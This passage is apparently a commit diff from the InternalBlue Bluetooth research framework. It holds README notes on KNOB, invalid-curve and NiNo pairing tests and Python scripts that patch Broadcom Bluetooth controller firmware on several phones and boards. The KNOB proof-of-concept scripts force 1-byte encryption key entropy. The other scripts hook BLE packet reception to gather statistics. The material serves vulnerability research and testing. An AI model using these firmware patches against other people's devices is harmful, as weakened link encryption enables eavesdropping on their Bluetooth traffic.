replies to all LMP packets with `LMP_not_accepted` if their source is not from a MAC address in the whitelist.
* [NiNo_PoC](NiNo_PoC.py) sets the IO capabilities of the *Nexus 5* to no input, no output.
KNOB Attack Test (CVE-2019-9506)
--------------------------------
We provide a modified version of the KNOB attack test, originally provided [here](https://github.com/francozappa/knob).
This script tests if the other device will accept a reduced key entropy of 1 byte instead of the optimal 16 byte.
Available for the [Raspberry Pi 3](rpi3/KNOB_PoC.py), [Raspberry Pi 3+/4](rpi3p_rpi4/KNOB_PoC.py),
[Nexus 5](nexus5/KNOB_PoC.py), [Nexus 6P](nexus6p/KNOB_PoC.py), [CYW20735 evaluation board](eval_cyw20735/KNOB_PoC.py),
and [Samsung Galaxy S8](s8/KNOB_PoC.py).
Invalid Curve Attack Test (CVE-2018-5383)
-----------------------------------------
This is a test which tires to set the y-coordinate during ECDH key exchange to zero. If the devie under test accepts the pairing
(50% probability), it is vulnerable. This is not an MITM implementation, it only tests, if the other device would be vulnerable in practice.
Available for the [Nexus 5](nexus5/CVE_2018_5383_Invalid_Curve_Attack_PoC.py).
LMP MAC Address Filter
----------------------
Only accept traffic from whitelisted MAC addresses and send `LMP_not_accepted` otherwise.
Available for the [Nexus 5](nexus5/LMP_MAC_Address_Filter.py).
NiNo Attack Test
----------------
Prior to pairing, an MITM can set the IO capabilities to no input, no output. This will skip the numeric comparison.
If the operating system displays a yes/no question during pairing, a warning, or similar, is up to the concrete implementation.
This script tests how the other device will behave in a pairing that does not use numeric comparison, but is no
active MITM attack.
Available for the [Nexus 5](nexus5/NiNo_PoC.py).
Measurement of BLE Receive Statistics
-------------------------------------
This demo provides a hook within the callback for BLE packet reception. Upon packet reception, no matter if the
packet is a keep-alive null packet or not, it will be processed by this function. During this state, further
metadata is available, such as the RSSI (Received Signal Strength Indicator), the packet's channel, and the
currently active channel map.
Available for the [Nexus 5](nexus5/BLE_Reception_PoC.py) and [Samsung Galaxy S8](s8/BLE_Reception_PoC.py) including a callback script,
as well as for the [CYW20735 Evaluation board](eval_cyw20735/BLE_Reception_PoC.py), [Raspberry Pi 3](rpi3/BLE_Reception_PoC.py)
and [3+/4](rpi3p_rpi4/BLE_Reception_PoC.py) currently without callback script.
We also ported it for the iPhone 6, however, the current *InternalBlue* iOS implementation cannot be run in parallel
with the full iOS stack, thus it is not pushed online here.
examples/eval_cyw20735/BLE_Reception_PoC.py
+47
View File
@@ -0,0 +1,47 @@
#!/usr/bin/python2
from pwn import *
from internalblue.adbcore import ADBCore
from internalblue.bluezcore import BluezCore
"""
Script that shows receive statistics from LE connections over HCI on the CYW20735B1 evaluation board.
Generated with Nexmon.
"""
internalblue = ADBCore()
try:
internalblue.interface = internalblue.device_list()[0][1] # just use the first Android device
except IndexError:
internalblue = BluezCore()
try:
internalblue.interface = internalblue.device_list()[0][1] # ...or the first local HCI interface
except IndexError:
log.critical("Adapt the Python script to use an available Broadcom Bluetooth interface.")
exit(-1)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
progress_log = log.info("Connected to first target, installing patches...")
# GENERATED PATCHES
internalblue.patchRom(0x0008ea46, '\x89\xf1\x5b\xbc')
internalblue.patchRom(0x0008edc2, '\x89\xf1\x1d\xbc')
internalblue.patchRom(0x0008eec0, '\x89\xf1\x1e\xbb')
internalblue.writeMem(0x00218200, '\x10\xb5\xcc\x22\xff\x21\xce\x20\x0c\xf6\x43\xfe\x04\x46\x04\x22\x07\x49\x0a\x30\x50\xf6\x53\xfb\x06\x4b\x04\xf1\x0e\x00\x19\x68\xc8\x22\x50\xf6\x4c\xfb\x20\x46\xbd\xe8\x10\x40\x0c\xf6\x03\xbd\x18\x80\x21\x00\x80\x28\x28\x00')
internalblue.writeMem(0x00218300, '\x95\xf6\x70\xfc\xff\xf7\x7c\xff\x76\xf6\x9f\xbb\x00\xbf\x00\xbf')
internalblue.writeMem(0x00218500, '\x2d\xe9\xf0\x5f\xfe\xb5\x07\x46\xf3\x22\xff\x21\xf5\x20\x0c\xf6\xc0\xfc\x04\x46\x04\xf1\x0a\x03\x04\x22\x0f\x49\x18\x46\x50\xf6\xce\xf9\x04\xf1\x0e\x03\x4f\xf0\xef\x02\x39\x46\x18\x46\x50\xf6\xc6\xf9\x04\xf1\x0e\x03\x4f\xf0\x01\x02\x07\xf5\xe9\x71\x18\x46\x50\xf6\xbd\xf9\x20\x46\x0c\xf6\x76\xfb\x38\x46\xbd\xe8\xfe\x40\x76\xf6\xb8\xbc\x00\xbf\x00\xbf\x00\x80\x21\x00')
internalblue.writeMem(0x00218600, '\x70\xb5\x05\x46\xfe\xb5\x05\x46\xf4\x22\xff\x21\xf6\x20\x0c\xf6\x40\xfc\x04\x46\x04\xf1\x0a\x03\x04\x22\x0b\x49\x18\x46\x50\xf6\x4e\xf9\x04\xf1\x0e\x03\x4f\xf0\xf0\x02\x29\x46\x18\x46\x50\xf6\x46\xf9\x20\x46\x0c\xf6\xff\xfa\x00\xf0\xe2\xf8\xbd\xe8\xfe\x40\x76\xf6\xc1\xbb\x00\xbf\x00\xbf\x08\x80\x21\x00')
internalblue.writeMem(0x00218800, '\x10\xb5\x08\x22\x82\xb0\xff\x21\x0a\x20\x0c\xf6\x42\xfb\x04\x22\x04\x46\x0b\x49\x0a\x30\x50\xf6\x52\xf8\x00\x20\x9f\xf6\xec\xff\x95\xf6\x3f\xff\x02\xa9\x41\xf8\x04\x0d\x04\x22\x04\xf1\x0e\x00\x50\xf6\x45\xf8\x20\x46\x0c\xf6\xfe\xf9\x02\xb0\x10\xbd\x00\xbf\x10\x80\x21\x00')
internalblue.writeMem(0x00218000, '\x52\x58\x44\x4e\x00\x00\x00\x00\x4c\x45\x50\x52\x00\x00\x00\x00\x52\x53\x53\x49\x00\x00\x00\x00\x52\x42\x55\x46\x00')
# shutdown connection
internalblue.shutdown()
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
examples/eval_cyw20735/KNOB_PoC.py
Executable
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a CYW20735 evaluation board.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A) # connection struct key entropy
internalblue.patchRom(0x7402A, patch)
# modify global variable for own setting
internalblue.writeMem(0x280F13, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
examples/nexus5/BLE_Reception_PoC.py
+176
View File
@@ -0,0 +1,176 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Nexus 5 for BLE connection events
from builtins import range
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
internalblue = ADBCore(serial=False)
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
"""
# _connTaskRxDone has a Patchram position, Nexus 5 patches look so worse that I guess
# they never planned to support BLE. Even callbacks are defined in Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
"""
RX_DONE_HOOK_ADDRESS = 0x224DEA
HOOKS_LOCATION = 0xd7500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r8,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x7AFC // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 2 // buffer starts at 2 with data (?)
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
//add r1, 0x100 //TODO use this to access the connection struct with different offset
bl 0x46FE6 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x12c // le_conn[0x12c] is position of RSSI in Nexus 5
mov r0, r4
add r0, 6
bl 0x46FE6 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x398c1 // send_hci_event_without_free()
// free HCI buffer
mov r0, r4
bl 0x3FA36 // osapi_blockPoolFree
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x%x
""" % (RX_DONE_HOOK_ADDRESS+4)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.writeMem(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
# RXDN statistics callback variables
internalblue.last_nesn_sn = None
internalblue.last_success_event = None
def lereceiveStatusCallback(record):
"""
RXDN Callback Function
Depends on the raspi3_rxdn.py or eval_rxdn.py script,
which patches the _connTaskRxDone() function and copies
info from the LE connection struct to HCI.
"""
hcipkt = record[0] # get HCI Event packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.data[0:4] == "RXDN":
data = hcipkt.data[4:]
# Raspi 3 gets errors
if len(data) < 239:
return
# !!! Nexus 5 has really outdated struct...
packet_curr_nesn_sn = u8(data[0xa0])
packet_channel_map = data[0x4c:0x4c+38]
packet_channel = u8(data[0x7b])
packet_event_ctr = u16(data[0x86:0x88])
packet_rssi = u8(data[0])
if internalblue.last_nesn_sn and ((internalblue.last_nesn_sn ^ packet_curr_nesn_sn) & 0b1100) != 0b1100:
log.info(" ^----------------------------- ERROR --------------------------------")
# currently only supported by eval board: check if we also went into the process payload routine,
# which probably corresponds to a correct CRC
# if self.last_success_event and (self.last_success_event + 1) != packet_event_ctr:
# log.debug(" ^----------------------------- MISSED -------------------------------")
# TODO example for setting the channel map
# timeout needs to be zero, because we are already in an event reception routine!
# self.sendHciCommand(0x2014, '\x00\x00\xff\x00\x00', timeout=0)
internalblue.last_nesn_sn = packet_curr_nesn_sn
# draw channel with rssi color
color = '\033[92m' # green
if 0xc8 > packet_rssi >= 0xc0:
color = '\033[93m' # yellow
elif packet_rssi < 0xc0:
color = '\033[91m' # red
channels_total = u8(packet_channel_map[37])
channel_map = 0x0000000000
if channels_total <= 37: # raspi 3 messes up with this during blacklisting
for channel in range(0, channels_total):
channel_map |= (0b1 << 39) >> u8(packet_channel_map[channel])
log.info("LE event %5d, map %10x, RSSI %d: %s%s*\033[0m " % (packet_event_ctr, channel_map,
(packet_rssi & 0x7f) - (128 * (packet_rssi >> 7)),
color, ' ' * packet_channel))
log.info("--------------------")
log.info("Entering InternalBlue CLI to display statistics.")
# add RXDN callback
internalblue.registerHciCallback(lereceiveStatusCallback)
# enter CLI
cli.commandLoop(internalblue)
examples/CVE_2018_5383_Invalid_Curve_Attack_PoC.py → examples/nexus5/CVE_2018_5383_Invalid_Curve_Attack_PoC.py
View File
examples/nexus5/KNOB_PoC.py
Executable
+100
View File
@@ -0,0 +1,100 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int
"""
This is a standalone PoC for the KNOB attack on a Nexus 5.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0) # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)
# modify global variable for own setting
internalblue.writeMem(0x203797, '\x01') # global key entropy
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0c\n"
"...shows the key size of handle 0x000c.\n")
class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."
parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)
parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")
def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True
def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))
return
# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)
# enter CLI
cli.commandLoop(internalblue)
examples/LMP_MAC_Address_Filter.py → examples/nexus5/LMP_MAC_Address_Filter.py
View File
examples/NiNo_PoC.py → examples/nexus5/NiNo_PoC.py
View File
examples/nexus6p/KNOB_PoC.py
Executable
+100
View File
@@ -0,0 +1,100 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int
"""
This is a standalone PoC for the KNOB attack on a Nexus 6P.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
#patch = asm("mov r2, #0x1", vma=0x4BC6E) # connection struct key entropy
#internalblue.patchRom(0x4BC6E, patch)
# this somehow crashes on the Nexus 6P, but the global variable seems to be sufficient :)
# modify global variable for own setting
internalblue.writeMem(0x204147, '\x01') # global key entropy
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0b\n"
"...shows the key size of handle 0x000b.\n")
class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."
parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)
parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")
def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True
def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))
return
# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)
# enter CLI
cli.commandLoop(internalblue)
examples/rpi3/BLE_Reception_PoC.py
+90
View File
@@ -0,0 +1,90 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from pwn import *
from internalblue.hcicore import HCICore
internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
RX_DONE_HOOK_ADDRESS = 0x35fbc # _connTaskRxDone
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r6,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x3670 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x45824 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x10a // le_conn[0x10a] is position of rssi
mov r0, r4
add r0, 14
bl 0x45824 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x358e // send_hci_event
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x35fc0
"""
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.patchRom(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
examples/rpi3/KNOB_PoC.py
Executable
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a Raspberry Pi 3.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x689F0) # connection struct key entropy
internalblue.patchRom(0x689F0, patch)
# modify global variable for own setting
internalblue.writeMem(0x204127, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
examples/rpi3p_rpi4/BLE_Reception_PoC.py
+90
View File
@@ -0,0 +1,90 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from pwn import *
from internalblue.hcicore import HCICore
internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
RX_DONE_HOOK_ADDRESS = 0x56622 # _connTaskRxDone
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r6,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x2770 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x775C8 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x10a // le_conn[0x10a] is position of rssi
mov r0, r4
add r0, 14
bl 0x775C8 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x268E // send_hci_event
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x56626
"""
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.patchRom(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
examples/rpi3p_rpi4/KNOB_PoC.py
Executable
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a Raspberry Pi 3+/4.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x3B3D4) # connection struct key entropy
internalblue.patchRom(0x3B3D4, patch)
# modify global variable for own setting
internalblue.writeMem(0x204A5F, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
examples/s8/BLE_Reception_PoC.py
+179
View File
@@ -0,0 +1,179 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Samsung Galaxy S8 for BLE connection events
from builtins import range
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
internalblue = ADBCore(serial=True)
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
"""
# _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because
# they had to for Bluetooth 5 compliance.
# The base address is 0x5E324, and this will jump into the Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
"""
#RX_DONE_HOOK_ADDRESS = 0x1344D0 # on S8 with Patchlevel May 1 2019 on stock ROM
#RX_DONE_HOOK_ADDRESS = 0x134500 # on S8 with Lineage OS Nightly from August 30 2019
RX_DONE_HOOK_ADDRESS = 0x134514 # on S8 with Patchlevel September 1 2019 on stock ROM
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r12,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0xE628 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x857B4 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x1ca // le_conn[0x1ca] is position of rssi
mov r0, r4
add r0, 14
bl 0x857B4 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0xE418 // bthci_event_AttemptToEnqueueEventToTransport
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
//b 0x1344D4 // on S8 with Patchlevel May 1 2019 on stock ROM
//b 0x134504 // August 30 Nightly Build
b 0x%x
""" % (RX_DONE_HOOK_ADDRESS+4)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.writeMem(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
# RXDN statistics callback variables
internalblue.last_nesn_sn = None
internalblue.last_success_event = None
def lereceiveStatusCallback(record):
"""
RXDN Callback Function
Depends on the raspi3_rxdn.py or eval_rxdn.py script,
which patches the _connTaskRxDone() function and copies
info from the LE connection struct to HCI.
"""
hcipkt = record[0] # get HCI Event packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.data[0:4] == "RXDN":
data = hcipkt.data[4:]
# Raspi 3 gets errors
if len(data) < 239:
return
#if raspi or s8:
packet_curr_nesn_sn = u8(data[0xa0])
#elif eval:
# packet_curr_nesn_sn = u8(data[0xa4])
packet_channel_map = data[0x54:0x7b]
packet_channel = u8(data[0x83])
packet_event_ctr = u16(data[0x8e:0x90])
packet_rssi = u8(data[0])
if internalblue.last_nesn_sn and ((internalblue.last_nesn_sn ^ packet_curr_nesn_sn) & 0b1100) != 0b1100:
log.info(" ^----------------------------- ERROR --------------------------------")
# currently only supported by eval board: check if we also went into the process payload routine,
# which probably corresponds to a correct CRC
# if self.last_success_event and (self.last_success_event + 1) != packet_event_ctr:
# log.debug(" ^----------------------------- MISSED -------------------------------")
# TODO example for setting the channel map
# timeout needs to be zero, because we are already in an event reception routine!
# self.sendHciCommand(0x2014, '\x00\x00\xff\x00\x00', timeout=0)
internalblue.last_nesn_sn = packet_curr_nesn_sn
# draw channel with rssi color
color = '\033[92m' # green
if 0xc8 > packet_rssi >= 0xc0:
color = '\033[93m' # yellow
elif packet_rssi < 0xc0:
color = '\033[91m' # red
channels_total = u8(packet_channel_map[37])
channel_map = 0x0000000000
if channels_total <= 37: # raspi 3 messes up with this during blacklisting
for channel in range(0, channels_total):
channel_map |= (0b1 << 39) >> u8(packet_channel_map[channel])
log.info("LE event %5d, map %10x, RSSI %d: %s%s*\033[0m " % (packet_event_ctr, channel_map,
(packet_rssi & 0x7f) - (128 * (packet_rssi >> 7)),
color, ' ' * packet_channel))
log.info("--------------------")
log.info("Entering InternalBlue CLI to display statistics.")
# add RXDN callback
internalblue.registerHciCallback(lereceiveStatusCallback)
# enter CLI
cli.commandLoop(internalblue)
examples/s8/KNOB_PoC.py
Executable
+47
View File
@@ -0,0 +1,47 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
